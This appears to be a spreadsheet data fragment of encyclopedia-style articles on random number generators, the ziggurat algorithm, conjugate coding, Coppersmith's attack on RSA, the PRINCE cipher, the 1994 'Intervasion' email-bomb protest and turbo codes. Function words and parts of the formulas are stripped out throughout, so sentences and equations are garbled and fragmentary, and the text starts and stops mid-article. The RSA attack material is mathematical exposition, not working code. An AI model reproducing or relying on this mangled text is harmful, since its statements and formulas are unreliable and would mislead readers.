p_{r}} period length following sequence {\displaystyle (x_{n})_{n\geq sequence {\displaystyle (x_{n})_{n\geq compound pseudorandom numbers defined {\displaystyle x_{n}=\left(t_{1}x_{n}^{(1)}+t_{2}x_{n}^{(2)}+\dots +t_{r}x_{n}^{(r)}\right){\bmod {t}}} .the compound approach allows combining inversive congruential generators, provided full period, parallel generation systems. example {\displaystyle p_{1}=5} {\displaystyle p_{2}=7(r=2)} simplify, take {\displaystyle (x_{n}^{(1)})_{n\geq 0}=(0,1,2,3,4,\dots {\displaystyle (x_{n}^{(2)})_{n\geq 0}=(0,1,2,3,4,5,6,\dots compute every {\displaystyle x_{j}=7x_{j}^{(1)}+5x_{j}^{(2)}\mod {\displaystyle (x_{n})_{n\geq 0}=(0,12,24,1,13,25,2,14,26,3,15,27,4,16,28,5,17,29,6,18,30,7,19,31,8,20,32,9,21,33,10,22,34,11,23)} different sums obtain begin sequence again, period {\displaystyle 5\times 7=35\,} this method allows obtaining long period modular operations carried relatively small moduli. advantages accepted practical purposes number reasons. firstly, binary sequences produced free undesirable statistical deviations. inversive sequences extensively tested variety statistical tests remain stable variation parameter.secondly, exists steady simple parameter choice, based chou algorithm guarantees maximum period length. thirdly, compound approach properties single inversive generators, also provides period length significantly greater obtained single inversive congruential generator. they seem designed application multiprocessor parallel hardware platforms. there exists algorithm allows designing compound generators predictable period length, predictable linear complexity level, excellent statistical properties produced streams. procedure designing complex structure starts defining finite field elements ends choosing parameters inversive congruential generator component compound generator. means generator associated fixed polynomial. such condition sufficient maximum period inversive congruential generator finally maximum period compound generator. construction polynomials efficient approach find parameters inversive congruential generator maximum period length. discrepancy boundaries equidistribution statistical independence properties generated sequences, important usability stochastic simulation, analyzed based discrepancy s-tuples successive pseudorandom numbers {\displaystyle s=1} {\displaystyle s=2} respectively. discrepancy computes distance generator uniform one. discrepancy means sequence generated used cryptographic purposes, first inversive congruential generator provide pseudorandom numbers. definition arbitrary points {\displaystyle {\mathbf }_{1},\dots ,{\mathbf }_{n-1}\in [0,1)} discrepancy defined {\displaystyle d_{n}({\mathbf }_{1},\dots ,{\mathbf }_{n-1})={\rm {sup}}_{j}|f_{n}(j)-v(j)|} supremum extended subintervals {\displaystyle [0,1)^{s}} {\displaystyle f_{n}(j)} {\displaystyle n^{-1}} times number points among {\displaystyle {\mathbf }_{1},\dots ,{\mathbf }_{n-1}} falling {\displaystyle v(j)} denotes s-dimensional volume until now, sequences integers {\displaystyle t-1} order sequences {\displaystyle [0,1)^{s}} divide sequences integers period from definition, sequence {\displaystyle {\mathbf }_{1},\dots ,{\mathbf }_{n-1}} perfectly random well distributed interval {\displaystyle j=[0,1)^{s}} {\displaystyle v(j)=1} points {\displaystyle f_{n}(j)=n/n=1} hence {\displaystyle d_{n}({\mathbf }_{1},\dots ,{\mathbf }_{n-1})=0} instead sequence concentrated close point subinterval small {\displaystyle v(j)\approx {\displaystyle f_{n}(j)\approx n/n\approx {\displaystyle d_{n}({\mathbf }_{1},\dots ,{\mathbf }_{n-1})=1} then better worst case: {\displaystyle 0\leq d_{n}({\mathbf }_{1},\dots ,{\mathbf }_{n-1})\leq notations some notation necessary. integers {\displaystyle k\geq {\displaystyle q\geq {\displaystyle c_{k}(q)} nonzero lattice points {\displaystyle (h_{1},\dots ,h_{k})\in z^{k}} {\displaystyle -q/2&lt;h_{j}&lt;q/2} {\displaystyle 1\leq j\leq define {\displaystyle r(h,q)={\begin{cases}q\sin(\pi |h|/q)&amp;{\text{for }}h\in c_{1}(q)\\1&amp;{\text{for }}h=0\end{cases}}} {\displaystyle r(\mathbf ,q)=\prod _{j=1}^{k}r(h_{j},q)} {\displaystyle {\mathbf }=(h_{1},\dots ,h_{k})\in c_{k}(q)} real {\displaystyle abbreviation {\displaystyle e(t)={\rm {exp}}(2\pi \cdot it)} used, {\displaystyle u\cdot stands standard inner product {\displaystyle u,v} {\displaystyle r^{k}} higher bound {\displaystyle n\geq {\displaystyle q\geq integers. {\displaystyle {\mathbf }_{n}=y_{n}/q\in [0,1)^{k}} {\displaystyle y_{n}\in \{0,1,\dots ,q-1\}^{k}} {\displaystyle 0\leq n&lt;n} then discrepancy points {\displaystyle {\mathbf }_{0},\dots ,{\mathbf }_{n-1}} satisfies {\displaystyle d_{n}(\mathbf _{0},\mathbf _{1},\dots ,\mathbf _{n-1})} {\displaystyle {\frac {k}{q}}} {\displaystyle {\frac {1}{n}}} {\displaystyle \sum _{h\in \mathbb _{k}(q)}} {\displaystyle {\frac {1}{r(\mathbf ,q)}}{\bigg |}\sum _{n=0}^{n-1}e(\mathbf \cdot \mathbf _{n}){\bigg lower bound discrepancy {\displaystyle arbitrary points {\displaystyle \mathbf _{1},\dots ,\mathbf _{n-1}\in [0,1)^{k}} satisfies {\displaystyle d_{n}(\mathbf _{0},\mathbf _{1},\dots ,\mathbf _{n-1})\geq {\frac {\pi }{2n((\pi +1)^{l}-1)\prod _{j=1}^{k}{\rm {max}}(1,h_{j})}}{\bigg |}\sum _{n=0}^{n-1}e(\mathbf \cdot \mathbf _{n}){\bigg nonzero lattice point {\displaystyle {\mathbf }=(h_{1},\dots ,h_{k})\in z^{k}} {\displaystyle denotes number nonzero coordinates {\displaystyle {\mathbf these theorems show perfect discrepancy greater strictly positive value also worst generator discrepancy lower value less there exist also theorems bound average value discrepancy compound inversive generators also ones take values discrepancy bounded value depending parameters. details original paper. also pseudorandom number generator list random number generators linear congruential generator generalized inversive congruential pseudorandom numbers naor-reingold pseudorandom function references external links inversive generators university salzburg.</t>
  </si>
  <si>
    <t>Ziggurat algorithm</t>
  </si>
  <si>
    <t>ziggurat algorithm algorithm pseudo-random number sampling. belonging class rejection sampling algorithms, relies underlying source uniformly-distributed random numbers, typically pseudo-random number generator, well precomputed tables. algorithm used generate values monotonically decreasing probability distribution. also applied symmetric unimodal distributions, normal distribution, choosing value half distribution randomly choosing half value considered drawn from. developed george marsaglia others 1960s. typical value produced algorithm requires generation random floating-point value random table index, followed table lookup, multiply operation comparison. sometimes (2.5% time, case normal exponential distribution using typical table sizes) computations required. nevertheless, algorithm computationally much faster commonly used methods generating normally distributed random numbers, marsaglia polar method box–muller transform, require least logarithm square root calculation pair generated values. however, since ziggurat algorithm complex implement best used large quantities random numbers required. term ziggurat algorithm dates marsaglia's paper tsang 2000; named conceptually based covering probability distribution rectangular segments stacked decreasing order size, resulting figure resembles ziggurat. theory operation ziggurat algorithm rejection sampling algorithm; randomly generates point distribution slightly larger desired distribution, tests whether generated point inside desired distribution. not, tries again. given random point underneath probability density curve, coordinate random number desired distribution. distribution ziggurat algorithm chooses made equal-area regions; rectangles cover bulk desired distribution, non-rectangular base includes tail distribution. given monotone decreasing probability density function f(x), defined base ziggurat defined points inside distribution f(x1). this consists rectangular region (x1, y1), (typically infinite) tail distribution, (and y1). this layer (call layer area this, rectangular layer width height a/x1, also area layer height a/x1, intersects density function point (x2, y2), f(x2). this layer includes every point density function (unlike base layer) also includes points (x1, desired distribution. further layers stacked top. precomputed table size typical), chooses meaning box, layer reaches distribution's peak f(0)) exactly. layer extends vertically yi+1, divided regions horizontally: (generally larger) portion xi+1 entirely contained within desired distribution, (small) portion xi+1 partially contained. ignoring moment problem layer given uniform random variables [0,1), ziggurat algorithm described choose random layer u0xi. xi+1, return u1(yi+1 yi). compute f(x). f(x), return otherwise, choose random numbers back step 1.step amounts choosing low-resolution coordinate. step tests coordinate clearly within desired density function without knowing coordinate. not, step chooses high-resolution coordinate, step rejection test. with closely spaced layers, algorithm terminates step large fraction time. layer however, test always fails, layer also divided central region edge, edge infinite tail. algorithm check point central region, generate fictitious a/y1. this generate points correct frequency, rare case layer selected special fallback algorithm select point random tail. because fallback algorithm used less time thousand, speed essential. thus, full ziggurat algorithm one-sided distributions choose random layer u0xi xi+1, return generate point tail using fallback algorithm. u1(yi+1 yi). compute f(x). f(x), return otherwise, choose random numbers back step 1.for two-sided distribution, result must negated time. this often done conveniently choosing (−1,1) and, step testing xi+1. fallback algorithms tail because ziggurat algorithm generates outputs rapidly, requires fallback algorithm whenever always complex direct implementation. specific fallback algorithm depends distribution. exponential distribution, tail looks like body distribution. fall back elementary algorithm −ln(u1) ln(u1). another call ziggurat algorithm recursively result. normal distribution, marsaglia suggests compact algorithm: −ln(u1)/x1. −ln(u2). return otherwise, back step 1.since typical table sizes, test step almost always successful. optimizations algorithm performed efficiently precomputed tables f(xi), modifications make even faster: nothing ziggurat algorithm depends probability distribution function normalized (integral curve equal removing normalizing constants speed computation f(x). most uniform random number generators based integer random number generators return integer range table 2−32xi lets numbers directly when computing two-sided distributions using two-sided described earlier, random integer interpreted signed number range [−231, scale factor 2−31 used. rather comparing u0xi xi+1 step possible precompute xi+1/xi compare directly. integer random number generator, limits premultiplied 231, appropriate) integer comparison used. with changes, table unmodified values longer needed deleted. when generating ieee single-precision floating point values, 24-bit mantissa (including implicit leading least-significant bits 32-bit integer random number used. these bits used select layer number. (see references detailed discussion this.) first three steps inline function, call out-of-line implementation less frequently needed steps. generating tables possible store entire table precomputed, include values implementation −1(y) source code, compute remaining values initializing random number generator. previously described, find −1(yi) yi+1 a/xi. repeat times layers ziggurat. end, f(0). there round-off error, useful sanity test acceptably small. when actually filling table values, assume f(0), accept slight difference layer area rounding error. finding given initial (guess need compute area tail exponential distribution, e−x1, normal distribution, assuming using unnormalized f(x) e−x2/2, √π/2 erfc(x/√2). awkward distributions, numerical integration required. with hand, find f(x1), area tail, area base layer x1y1 then compute series above. f(0) initial estimate low, leading large area f(0), initial estimate high. given this, root-finding algorithm (such bisection method) find value produces yn−1 close f(0) possible. alternatively, look value makes area topmost layer, xn−1(f(0) yn−1), close desired value possible. this saves evaluation −1(x) actually condition greatest interest. references george marsaglia; tsang (2000). "the ziggurat method generating random variables". journal statistical software. (8). retrieved 2007-06-20. this paper numbers layers starting top, makes layer bottom special case, explanation numbers layers bottom. implementation ziggurat method normal density function exponential density function, essentially copy code paper. (potential users aware code assumes 32-bit integers.) implementation ziggurat algorithm overview method. jurgen doornik (2005). improved ziggurat method generate normal random samples" (pdf). nuffield college, oxford. retrieved 2007-06-20. {{cite journal}}: cite journal requires |journal= (help) describes hazards using least-significant bits integer random number generator choose layer number. normal behavior cleve moler, mathworks, describing ziggurat algorithm introduced matlab version 2001. ziggurat random normal generator blogs mathworks, posted cleve moler, 2015. david thomas; philip h.w. leong; wayne luk; john villasenor (october 2007). "gaussian random number generators" (pdf). computing surveys. (4): 11:1–38. doi:10.1145/1287620.1287622. issn 0360-0300. s2cid 10948255. retrieved 2009-07-27. [w]hen maintaining extremely high statistical quality first priority, subject constraint, speed also desired, ziggurat method often appropriate choice. comparison several algorithms generating gaussian random numbers. nadler, boaz (2006). "design flaws implementation ziggurat monty python methods (and remarks matlab randn)". arxiv:math/0603058.. illustrates problems underlying uniform pseudo-random number generators problems affect ziggurat algorithm's output. edrees, hassan cheung, brian; sandora, mccullen; nummey, david; stefan, deian (13–16 july 2009). hardware-optimized ziggurat algorithm high-speed gaussian random number generators (pdf). 2009 international conference engineering reconfigurable systems algorithms. vegas. marsaglia, george (september 1963). generating variable tail normal distribution (technical report). boeing scientific research labs. mathematical note 322, dtic accession number ad0423993. archived original september 2014 defense technical information center.</t>
  </si>
  <si>
    <t>Journal of Cryptology</t>
  </si>
  <si>
    <t>journal cryptology (issn 0933-2790) scientific journal field cryptology cryptography. journal published quarterly international association cryptologic research. editor-in-chief vincent rijmen. references external links journal cryptology</t>
  </si>
  <si>
    <t>Conjugate coding</t>
  </si>
  <si>
    <t>conjugate coding cryptographic tool, introduced stephen wiesner late 1960s. part applications wiesner described quantum coding, along method creating fraud-proof banking notes. application concept based method transmitting multiple messages reading destroys others. this called quantum multiplexing uses photons polarized conjugate bases "qubits" pass information. conjugate coding also simple extension random number generator.at behest charles bennett, wiesner published manuscript explaining basic idea conjugate coding number examples embraced significantly ahead time. because publication rejected, developed world public-key cryptography 1980s oblivious transfer, first michael rabin shimon even. used field quantum computing. initial concept quantum cryptography developed bennett gilles brassard also based concept. references</t>
  </si>
  <si>
    <t>Coppersmith's attack</t>
  </si>
  <si>
    <t>coppersmith's attack describes class cryptographic attacks public-key cryptosystem based coppersmith method. particular applications coppersmith method attacking include cases public exponent small partial knowledge prime factor secret available. basics public system tuple integers {\displaystyle (n,e)} product primes secret given integer satisfying {\displaystyle ed\equiv 1{\pmod {(p-1)(q-1)}}} equivalently, secret given {\displaystyle d_{p}\equiv d{\pmod {p-1}}} {\displaystyle d_{q}\equiv d{\pmod {q-1}}} chinese remainder theorem used improve speed decryption, crt-rsa. encryption message produces ciphertext {\displaystyle c\equiv m^{e}{\pmod {n}}} decrypted using {\displaystyle computing {\displaystyle c^{d}\equiv m{\pmod {n}}} public exponent attack order reduce encryption signature verification time, useful small public exponent {\displaystyle practice, common choices {\displaystyle 65537 {\displaystyle (2^{16}+1)} these values fermat primes, sometimes referred {\displaystyle f_{0},f_{2}} {\displaystyle f_{4}} respectively {\displaystyle (f_{x}=2^{2^{x}}+1)} they chosen make modular exponentiation operation faster. also, chosen {\displaystyle simpler test whether {\displaystyle \gcd(e,p-1)=1} {\displaystyle \gcd(e,q-1)=1} generating testing primes step generation. values {\displaystyle {\displaystyle fail test rejected then. (even better: prime greater test {\displaystyle p{\bmod {e}}\neq replace expensive test {\displaystyle \gcd(p-1,e)=1} public exponent small plaintext {\displaystyle short, function easy invert, makes certain attacks possible. padding schemes ensure messages full lengths, additionally choosing public exponent {\displaystyle e=2^{16}+1} recommended. when value used, signature verification requires multiplications, opposed random {\displaystyle similar size used. unlike private exponent (see wiener's attack), attacks apply small {\displaystyle used total break, would recover secret powerful attacks public exponent based following theorem, coppersmith. coppersmith method theorem (coppersmith) integer {\displaystyle f\in {\mathbb }[x]} monic polynomial degree {\displaystyle integers. {\displaystyle x=n^{{\frac {1}{d}}-\epsilon {\displaystyle {\frac {1}{d}}&gt;\epsilon then, given {\displaystyle \left\langle n,f\right\rangle attacker (eve) efficiently find integers {\displaystyle x_{0}&lt;x} satisfying {\displaystyle f(x_{0})\equiv 0{\pmod {n}}} running time dominated time takes algorithm lattice dimension {\displaystyle (w)} {\displaystyle w=\min \left\{{\frac {1}{\epsilon }},\log _{2}n\right\}} .this theorem states existence algorithm efficiently find roots {\displaystyle modulo {\displaystyle smaller {\displaystyle x=n^{\frac {1}{d}}} {\displaystyle gets smaller, algorithm's runtime decreases. this theorem's strength ability find small roots polynomials modulo composite {\displaystyle håstad's broadcast attack simplest form håstad's attack presented ease understanding. general case uses coppersmith method. suppose sender sends message {\displaystyle encrypted form number people {\displaystyle p_{1};p_{2};\dots ;p_{k}} using small public exponent {\displaystyle {\displaystyle e=3} different moduli {\displaystyle \left\langle n_{i},e\right\rangle simple argument shows soon {\displaystyle k\geq ciphertexts known, message {\displaystyle longer secure: suppose intercepts {\displaystyle c_{1},c_{2}} {\displaystyle c_{3}} {\displaystyle c_{i}\equiv m^{3}{\pmod {n_{i}}}} assume {\displaystyle \gcd(n_{i},n_{j})=1} {\displaystyle i,j} (otherwise, possible compute factor numbers {\displaystyle n_{i}} computing {\displaystyle \gcd(n_{i},n_{j})} chinese remainder theorem, compute {\displaystyle c\in \mathbb _{n_{1}n_{2}n_{3}}^{*}} {\displaystyle c\equiv c_{i}{\pmod {n_{i}}}} then {\displaystyle c\equiv m^{3}{\pmod {n_{1}n_{2}n_{3}}}} however, since {\displaystyle m&lt;n_{i}} {\displaystyle {\displaystyle m^{3}&lt;n_{1}n_{2}n_{3}} thus {\displaystyle c=m^{3}} holds integers, compute cube root {\displaystyle obtain {\displaystyle larger values {\displaystyle ciphertexts needed, particularly, {\displaystyle ciphertexts sufficient. generalizations håstad also showed applying linear padding {\displaystyle prior encryption protect attack. assume attacker learns {\displaystyle c_{i}=f_{i}(m)^{e}} {\displaystyle 1\leq i\leq linear function {\displaystyle f_{i}} i.e., applies message {\displaystyle prior encrypting recipients receive slightly different messages. instance, {\displaystyle {\displaystyle bits long, might encrypt {\displaystyle m_{i}=i2^{m}+m} send {\displaystyle recipient. large enough group people involved, attacker recover plaintext {\displaystyle m_{i}} ciphertext similar methods. generality, håstad proved system univariate equations modulo relatively prime composites, applying fixed polynomial {\displaystyle g_{i}(m)\equiv 0{\pmod {n_{i}}}} could solved sufficiently many equations provided. this attack suggests randomized padding used encryption. theorem (håstad) suppose {\displaystyle n_{1},\dots ,n_{k}} relatively prime integers {\displaystyle n_{\text{min}}=\min _{i}\{n_{i}\}} {\displaystyle g_{i}(x)\in \mathbb /n_{i}[x]} {\displaystyle polynomials maximum degree {\displaystyle suppose exists unique {\displaystyle m&lt;n_{\text{min}}} satisfying {\displaystyle g_{i}(m)\equiv 0{\pmod {n_{i}}}} {\displaystyle i\in \left\{1,\dots ,k\right\}} furthermore, suppose {\displaystyle k&gt;q} there efficient algorithm that, given {\displaystyle \left\langle n_{i},g_{i}(x)\right\rangle {\displaystyle computes {\displaystyle .proofsince {\displaystyle n_{i}} relatively prime chinese remainder theorem might used compute coefficients {\displaystyle t_{i}} satisfying {\displaystyle t_{i}\equiv 1{\pmod {n_{i}}}} {\displaystyle t_{i}\equiv 0{\pmod {n_{j}}}} {\displaystyle i\neq setting {\displaystyle g(x)=\sum t_{i}\cdot g_{i}(x)} know {\displaystyle g(m)\equiv 0{\pmod {\prod n_{i}}}} since {\displaystyle t_{i}} nonzero, {\displaystyle g(x)} also nonzero. degree {\displaystyle g(x)} {\displaystyle coppersmith’s theorem, compute integer roots {\displaystyle x_{0}} satisfying {\displaystyle g(x_{0})\equiv 0{\pmod {\prod n_{i}}}} {\displaystyle \left|x_{0}\right|&lt;\left(\prod n_{i}\right)^{\frac {1}{q}}} however, know {\displaystyle m&lt;n_{\text{min}}&lt;\left(\prod n_{i}\right)^{\frac {1}{k}}&lt;\left(\prod n_{i}\right)^{\frac {1}{q}}} {\displaystyle among roots found coppersmith's theorem. this theorem applied problem broadcast following manner: suppose {\displaystyle plaintext padded polynomial {\displaystyle f_{i}(x)} {\displaystyle g_{i}={\big (}f_{i}(x){\big )}^{e_{i}}-c_{i}{\bmod {n}}_{i}} then {\displaystyle g_{i}(m)\equiv 0{\bmod {n}}_{i}} true, coppersmith’s method used. attack succeeds {\displaystyle k&gt;\max _{i}(e_{i}\cdot \deg f_{i})} {\displaystyle number messages. original result used håstad’s variant instead full coppersmith method. result, required {\displaystyle k=o(q^{2})} messages, {\displaystyle q=\max _{i}(e_{i}\cdot \deg f_{i})} franklin–reiter related-message attack franklin reiter identified attack multiple related messages encrypted: messages differ known fixed difference messages rsa-encrypted modulus {\displaystyle possible recover them. attack originally described public exponent {\displaystyle e=3} works generally (with increasing cost {\displaystyle grows). {\displaystyle \left\langle n;e_{i}\right\rangle alice's public key. suppose {\displaystyle m_{1};m_{2}\in \mathbb _{n}} distinct messages satisfying {\displaystyle m_{1}\equiv f(m_{2}){\pmod {n}}} publicly known polynomial {\displaystyle f\in \mathbb _{n}[x]} send {\displaystyle m_{1}} {\displaystyle m_{2}} alice, naively encrypt messages transmit resulting ciphertexts {\displaystyle c_{1};c_{2}} easily recover {\displaystyle m_{1};m_{2}} given {\displaystyle c_{1};c_{2}} using following theorem: theorem (franklin–reiter) {\displaystyle \left\langle n,e\right\rangle public key. {\displaystyle m_{1}\neq m_{2}\in \mathbb _{n}^{*}} satisfy {\displaystyle m_{1}\equiv f(m_{2}){\pmod {n}}} linear polynomial {\displaystyle f=ax+b\in \mathbb _{n}[x]} {\displaystyle b\neq then, given {\displaystyle \left\langle n,e,c_{1},c_{2},f\right\rangle attacker (eve) recover {\displaystyle m_{1},m_{2}} time quadratic {\displaystyle e\cdot \log .proofsince {\displaystyle c_{1}\equiv m_{1}^{e}{\pmod {n}}} know {\displaystyle m_{2}} root polynomial {\displaystyle g_{1}(x)=f(x)^{e}-c_{1}\in \mathbb _{n}[x]} similarly, {\displaystyle m_{2}} root {\displaystyle g_{2}(x)=x^{e}-c_{2}\in \mathbb _{n}[x]} hence, linear factor {\displaystyle x-m_{2}} divides polynomials. therefore, calculate greatest common divisor {\displaystyle \gcd(g_{1},g_{2})} {\displaystyle g_{1}} {\displaystyle g_{2}} {\displaystyle \gcd turns linear, {\displaystyle m_{2}} found. {\displaystyle \gcd computed quadratic time {\displaystyle {\displaystyle \log using euclidean algorithm. coppersmith’s short-pad attack like håstad’s franklin–reiter’s attacks, attack exploits weakness public exponent {\displaystyle e=3} coppersmith showed randomized padding suggested håstad used improperly, encryption secure. suppose sends message {\displaystyle alice using small random padding encrypting attacker, eve, intercepts ciphertext prevents reaching destination. decides resend {\displaystyle alice alice respond message. randomly pads {\displaystyle transmits resulting ciphertext. ciphertexts corresponding encryptions message using different random pads. even though know random used, still recover message {\displaystyle using following theorem, random padding short. theorem (coppersmith) {\displaystyle \left\langle n,e\right\rangle public key, {\displaystyle {\displaystyle bits long. {\displaystyle m=\left\lfloor {\frac {n}{e^{2}}}\right\rfloor {\displaystyle m\in \mathbb _{n}^{*}} message length {\displaystyle n-m} bits. define {\displaystyle m_{1}=2^{m}m+r_{1}} {\displaystyle m_{2}=2^{m}m+r_{2}} {\displaystyle r_{1}} {\displaystyle r_{2}} distinct integers {\displaystyle 0\leq r_{1},r_{2}&lt;2^{m}} given {\displaystyle \left\langle n,e\right\rangle encryptions {\displaystyle c_{1},c_{2}} {\displaystyle m_{1},m_{2}} (but given {\displaystyle r_{1}} {\displaystyle r_{2}} efficiently recover {\displaystyle .proofdefine {\displaystyle g_{1}(x,y)=x^{e}-c_{1}} {\displaystyle g_{2}(x,y)=(x+y)^{e}-c_{2}} know {\displaystyle y=r_{2}-r_{1}} polynomials {\displaystyle x=m_{1}} common root. words, {\displaystyle \delta =r_{2}-r_{1}} root resultant {\displaystyle h(y)=\operatorname {res} _{x}(g_{1},g_{2})\in \mathbb _{n}[y]} furthermore, {\displaystyle |\delta |&lt;2^{m}&lt;n^{\frac {1}{e^{2}}}} hence, {\displaystyle \delta small root {\displaystyle modulo {\displaystyle efficiently find using coppersmith method. once {\displaystyle \delta known, franklin–reiter attack used recover {\displaystyle m_{2}} consequently {\displaystyle also roca attack references</t>
  </si>
  <si>
    <t>Prince (cipher)</t>
  </si>
  <si>
    <t>prince block cipher targeting latency, unrolled hardware implementations. based so-called construction. notable feature alpha reflection: decryption encryption related cheap compute. unlike "lightweight" ciphers, small number rounds layers constituting round logic depth. result, fully unrolled implementation able reach much higher frequencies present. according authors, time constraints technologies, prince uses times less area present-80 14–15 times less area aes-128. overview block size bits size bits. split keys {\displaystyle k_{0}} {\displaystyle k_{1}} input xored {\displaystyle k_{0}} processed core function using {\displaystyle k_{1}} output core function xored {\displaystyle k'_{0}} produce final output {\displaystyle k_{0}'} value derived {\displaystyle k_{0}} decryption done exchanging {\displaystyle k_{0}} {\displaystyle k'_{0}} feeding core function {\displaystyle k_{1}} xored constant denoted alpha. core function contain "forward" rounds, middle round, "backward" rounds, rounds total. original paper mentions rounds without explicitly depicting them; middle round counted rounds contains nonlinear layers), total number rounds forward round starts round constant xored {\displaystyle k_{1}} nonlinear layer {\displaystyle finally linear layer {\displaystyle "backward" rounds exactly inverse "forward" rounds except round constants. nonlinear layer based single 4-bit s-box chosen among affine-equivalent specified s-boxes. linear layer consists multiplication 64x64 matrix {\displaystyle shift similar operating 4-bit nibbles rather bytes. {\displaystyle constructed 16x16 matrices {\displaystyle m_{0}} {\displaystyle m_{1}} multiplication {\displaystyle computed four smaller multiplications, using {\displaystyle m_{0}} using {\displaystyle m_{1}} middle round consists {\displaystyle layer followed {\displaystyle followed {\displaystyle s^{-1}} layer. cryptanalysis encourage cryptanalysis prince cipher, organizations behind created "prince challenge". paper "security analysis prince" presents several attacks full round reduced variants, particular, attack complexity 2125.1 related attack requiring data. generic time–memory–data tradeoff constructions published, application prince. paper argues construction fine solution improve security widely deployed cipher (like des-x des) questionable choice designs. presents tweak prince cipher strengthen particular kind attack. biclique cryptanalysis attack published full cipher. somewhat inline estimation designers since reduces search space 21.28 (the original paper mentions factor paper "reflection cryptanalysis prince-like ciphers" focuses alpha reflection establishes choice criteria alpha constant. shows poorly chosen alpha would lead efficient attacks full cipher; value randomly chosen designers among weak ones.several meet-in-the-middle attacks published round reduced versions.an attack multi-user setting find keys users among users time 265.an attack rounds overall complexity 118.56 bits published.an attack rounds time complexity operations published.a differential fault attack published using faulty cipher texts random nibble fault model.the paper "new approaches round-reduced prince cipher cryptanalysis" presents boomerang attack known-plaintext attack reduced round versions rounds. 2015 additional attacks published freely available. most practical attacks reduced round versions references external links http://eprint.iacr.org/2012/529.pdf original paper: "prince low-latency block cipher pervasive computing applications" https://www.emsec.rub.de/research/research_startseite/prince-challenge prince challenge home page https://github.com/sebastien-riou/prince-c-ref software implementations https://github.com/weedegee/prince software implementations python https://github.com/huljar/prince-vhdl hardware implementation vhdl</t>
  </si>
  <si>
    <t>Intervasion of the UK</t>
  </si>
  <si>
    <t>intervasion 1994 electronic civil disobedience collective action john major's criminal justice bill sought outlaw outdoor dance festivals "music repetitive beat". launched group called zippies francisco's club fawkes day, november 1994, resulted government websites going least week. utilised form distributed denial service (ddos) known email bomb order overload servers form online protest internet activism. first internet technology weapon struggle and/or civil disobedience, preceded 1995 italian netstrike. campaign under criminal justice public order 1994, definition music played rave given "music includes sounds wholly predominantly characterised emission succession repetitive beats".sections targeted electronic dance music played raves. criminal justice public order empowered police stop rave open "ten people attending, making preparations rave". section allowed uniformed constable believes person rave within 5-mile (8.0 radius stop direct away area; "non-compliant citizens subject maximum fine exceeding level standard scale (£1000)".the zippies sought mailboxes politicians associated bill order bring attention issue natural justice involving basic rights freedoms. effect, collective action saying: take away freedom, power take away something take granted, deploys internet weapon".several hackers directly associated group launched all-out penetration testing load testing operations several government websites, resulting tit-for-tat battle, zippies mailbox morph.com went down, along entire server morph, well-known area bbs. media coverage event broadcast radio free berkeley. protest action occurred manhunt kevin mitnick thus partly underground event. media also refused entertain implications electronic civil disobedience, public attention focused problem illegal raves black-hat hackers, prompting scare stories "evil hackers" "young hoodlums" penetrating british defences zippies written nothing electrohippies. criticism some criticism intervasion expressed electronic frontier foundation complained "lack cutoff date". other criticism whole earth 'lectronic link (well) centered militant language. online protest action also suffered conflict stated aims: clog servers government", call send email messages politicians. thus jamming mailboxes email large file attachments defeated purpose exercise essentially early form hacktivism. nature collective action also articulated well enough. instance, digital be-in occurred launch timothy leary's chaos cyberculture, leary "kidnapped" without consent publisher, "forced" ddos government, simply protest message, sent repeatedly mail-boxes around world. tools distributed denial service email bomb uucp vt100 terminal emulator powerbook ping death also culture jamming electronic civil disobedience electrohippies e-mail bomb hacktivism netstrike reality hacking internet activism references</t>
  </si>
  <si>
    <t>Turbo code</t>
  </si>
  <si>
    <t>information theory, turbo codes (originally french turbocodes) class high-performance forward error correction (fec) codes developed around 1990–91, first published 1993. they first practical codes closely approach maximum channel capacity shannon limit, theoretical maximum code rate reliable communication still possible given specific noise level. turbo codes used 3g/4g mobile communications (e.g., umts lte) (deep space) satellite communications well applications designers seek achieve reliable information transfer bandwidth- latency-constrained communication links presence data-corrupting noise. turbo codes compete low-density parity-check (ldpc) codes, provide similar performance. name "turbo code" arose feedback loop used normal turbo code decoding, analogized exhaust feedback used engine turbocharging. hagenauer argued term turbo code misnomer since feedback involved encoding process. history fundamental patent application turbo codes filed april 1991. patent application lists claude berrou sole inventor turbo codes. patent filing resulted several patents including patent 5,446,747, expired august 2013. first public paper turbo codes "near shannon limit error-correcting coding decoding: turbo-codes". this paper published 1993 proceedings ieee international communications conference. 1993 paper formed three separate submissions combined space constraints. merger caused paper list three authors: berrou, glavieux, thitimajshima (from télécom bretagne, former enst bretagne, france). however, clear original patent filing berrou sole inventor turbo codes authors paper contributed material core concepts.turbo codes revolutionary time introduction many experts field coding believe reported results. when performance confirmed small revolution world coding took place investigation many types iterative signal processing. first class turbo code parallel concatenated convolutional code (pccc). since introduction original parallel turbo codes 1993, many classes turbo code discovered, including serial versions serial concatenated convolutional codes repeat-accumulate codes. iterative turbo decoding methods also applied conventional systems, including reed–solomon corrected convolutional codes, although systems complex practical implementations iterative decoders. turbo equalization also flowed concept turbo coding. addition turbo codes, berrou also invented recursive systematic convolutional (rsc) codes, used example implementation turbo codes described patent. turbo codes codes seem perform better turbo codes codes. prior turbo codes, best constructions serial concatenated codes based outer reed–solomon error correction code combined inner viterbi-decoded short constraint length convolutional code, also known codes. later paper, berrou gave credit intuition battail, hagenauer hoeher, who, late 80s, highlighted interest probabilistic processing." adds gallager tanner already imagined coding decoding techniques whose general principles closely related," although necessary calculations impractical time. example encoder there many different instances turbo codes, using different component encoders, input/output ratios, interleavers, puncturing patterns. this example encoder implementation describes classic turbo encoder, demonstrates general design parallel turbo codes. this encoder implementation sends three sub-blocks bits. first sub-block m-bit block payload data. second sub-block parity bits payload data, computed using recursive systematic convolutional code (rsc code). third sub-block parity bits known permutation payload data, computed using code. thus, redundant different sub-blocks parity bits sent payload. complete block bits data code rate m/(m permutation payload data carried device called interleaver. hardware-wise, turbo code encoder consists identical coders, depicted figure, connected using concatenation scheme, called parallel concatenation: figure, memory register. delay line interleaver force input bits appear different sequences. first iteration, input sequence appears outputs encoder, encoder's systematic nature. encoders used iterations, rates respectively equal {\displaystyle {\begin{aligned}~r_{1}&amp;={\frac {n_{1}+n_{2}}{2n_{1}+n_{2}}}\\~r_{2}&amp;={\frac {n_{1}+n_{2}}{n_{1}+2n_{2}}}\end{aligned}}} decoder decoder built similar encoder. elementary decoders interconnected other, series, parallel. {\displaystyle \textstyle dec_{1}} decoder operates lower speed (i.e., {\displaystyle \textstyle r_{1}} thus, intended {\displaystyle \textstyle c_{1}} encoder, {\displaystyle \textstyle dec_{2}} {\displaystyle \textstyle c_{2}} correspondingly. {\displaystyle 